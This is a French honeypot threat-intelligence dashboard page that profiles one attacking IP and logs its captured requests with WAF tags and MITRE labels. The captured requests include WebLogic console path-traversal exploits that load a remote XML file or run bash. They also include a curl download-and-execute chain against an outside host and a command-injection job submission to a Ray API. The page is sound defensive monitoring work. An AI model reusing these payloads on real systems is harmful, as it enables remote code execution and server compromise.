Profil de menace
Activité suspecte — risque 42/100 (Moyen) — MITRE T1046 — confiance 100 % — via HTTP — multi-protocole (2 protocoles · 5 min)
Période analysée : 2026-04-22 → 2026-07-21
Activité suspecte — risque 42/100 (Moyen) — MITRE T1046 — confiance 100 % — via HTTP — multi-protocole (2 protocoles · 5 min)
Activité suspecte — risque 42/100 (Moyen) — MITRE T1046 — confiance 100 % — via HTTP — multi-protocole (2 protocoles · 5 min)
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Tags WAF: sap-sapcontrol-path · confiance 100%
Confiance 100 % — Score WAF 20 · Bonus corrélation +12 · 1 tag(s) WAF
ASN 60064 · 192.142.28.0/24 · AFRINIC — 4 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 55 événements sur la période pour cette IP.
Même FAI Hostpalace Datacenters Ltd — corrélation indicative.
Cette IP touche plusieurs services simulés (pas seulement le web).
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
55 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
55 événement(s) — page 2/2
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 7001 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:7001 · (tentative d'exploit) · → /wl.xml%22) | Élevée | Élevé · 78 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wl.xml%22) UA Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Émulateur
HTTP
WAF
80
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wl.xml%22)
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/wl.xml%22)
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 78
Confiance : Confiance 100 % — Motif catalogue confirmé · 12 tag(s) WAF
Protocole émulé
1
Signaux
Http Lfi
pat-0508
pat-0105
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
ET path traversal encoded
SSRF Localhost SSRF
LFI Double-dot bypass
LFI Double URL-encoded traversal
ET WebLogic console
WebLogic console path
Probe /console/
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Règles WAF
lfi-0
lfi-14
rce-0
ssrf-2
ssrf-3
nosqli-3
redir-1
cache-poison-host
dns-rebind
Payload (extrait)
GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.sup
Requête brute (extrait)
GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://192.142.28.77/wl.xml%22) HTTP/1.1 Host: 127.0.0.1:7001 User-Agent: Mozilla/5.0 |
|||||||
| TCP | 7001 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:7001 · (tentative d'exploit) · → /wl.xml%22) | Élevée | Élevé · 78 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wl.xml%22) UA Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Émulateur
HTTP
WAF
80
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wl.xml%22)
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/wl.xml%22)
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 78
Confiance : Confiance 100 % — Motif catalogue confirmé · 12 tag(s) WAF
Protocole émulé
1
Signaux
Http Lfi
pat-0508
pat-0105
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
ET path traversal encoded
SSRF Localhost SSRF
LFI Double-dot bypass
LFI Double URL-encoded traversal
ET WebLogic console
WebLogic console path
Probe /console/
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Règles WAF
lfi-0
lfi-14
rce-0
ssrf-2
ssrf-3
nosqli-3
redir-1
cache-poison-host
dns-rebind
Payload (extrait)
GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.sup
Requête brute (extrait)
GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://192.142.28.77/wl.xml%22) HTTP/1.1 Host: 127.0.0.1:7001 User-Agent: Mozilla/5.0 |
|||||||
| TCP | 7001 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:7001 · (tentative d'exploit) · → /cumshotnews%3B+curl+-fsSL+--connect-timeout+10… | Élevée | Élevé · 78 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /cumshotnews%3B+curl+-fsSL+--connect-timeout+10+-o+cumshotnews+http://192.142.28.77/cumshotnews%3B+… UA Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Émulateur
HTTP
WAF
87
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cumshotnews%3B+curl+-fsSL+--connect-timeout+10+-o+cumshotnews+http://192.142.28.77/cumshotnews%3B+chmod+777+cumshotnews%3B+sh+cumshotnews%3B+rm+-f+cumshotnews'%7D)%3B%22)
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/cumshotnews%3B+curl+-fsSL+--connect-timeout+10+-o+cumshotnews+http://192.142.28.77/cumshotnews%3B+chmod+777+cumshotnews%3B+sh+cumshotnews%3B+rm+-f+cumshotnews…
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 78
Confiance : Confiance 100 % — Motif catalogue confirmé · 13 tag(s) WAF
Protocole émulé
1
Signaux
Http Lfi
pat-0508
pat-0105
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
JSP exec shell
CRS 932190 php system
ET path traversal encoded
CRS 932200
CRS 932205
CRS 932206
LFI Double-dot bypass
LFI Double URL-encoded traversal
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Règles WAF
lfi-0
lfi-14
rce-0
ssrf-2
ssrf-3
nosqli-3
redir-1
cache-poison-host
php-rce-passthru
dns-rebind
Payload (extrait)
GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22jav
Requête brute (extrait)
GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(new+java.lang.String%5B%5D%7B'/bin/bash','-c','chmod++x+/usr/bin/curl%3B+chmod++x+/usr/bin/wget |
|||||||
| TCP | 8983 · HTTP | http | probe solr probe solr · via HTTP:8983 · (sonde / probe) · → /solr/ | Élevée | Faible · 24 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET /solr/ UA Go-http-client/1.1
Émulateur
HTTP
WAF
6
Recommandation
Surveiller
Tags
Cible HTTP
GET
/solr/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8983
Chemin / cible
/solr/
Service
HTTP
Pourquoi cette classification : Tags WAF: nosqli-3 · confiance 0%
Confiance classification
0%
Risque capteur
Faible
· 24
Confiance : Confiance 0 % — 1 tag(s) WAF
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
Go-http-client/1.1
Règles WAF
nosqli-3
Payload (extrait)
GET /solr/ HTTP/1.1 Host: 62.3.50.33:8983 User-Agent: Go-http-client/1.1 Accept-Encoding: gzip Connection: close |
|||||||
| TCP | 8265 · HTTP | http | Injection de commande cmd injection · via HTTP:8265 · (tentative d'exploit) · → /api/jobs/ | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /api/jobs/ UA Go-http-client/1.1
Émulateur
HTTP
WAF
37
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api/jobs/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8265
Chemin / cible
/api/jobs/
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-14) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
Ligne de requête
User-Agent
Go-http-client/1.1
Règles WAF
lfi-14
rce-0
ssrf-3
nosqli-3
k8s-api
Payload (extrait)
POST /api/jobs/ HTTP/1.1 Host: 62.3.50.33:8265 User-Agent: Go-http-client/1.1 Content-Length: 338 Connection: close Content
Requête brute (extrait)
POST /api/jobs/ HTTP/1.1 Host: 62.3.50.33:8265 User-Agent: Go-http-client/1.1 Content-Length: 338 Connection: close Content-Type: application/json Accept-Encoding: gzip {"entrypoint": "chmod +x /usr/bin/wget; chmod +x /usr/bin/curl; cd /tmp || cd
|
|||||||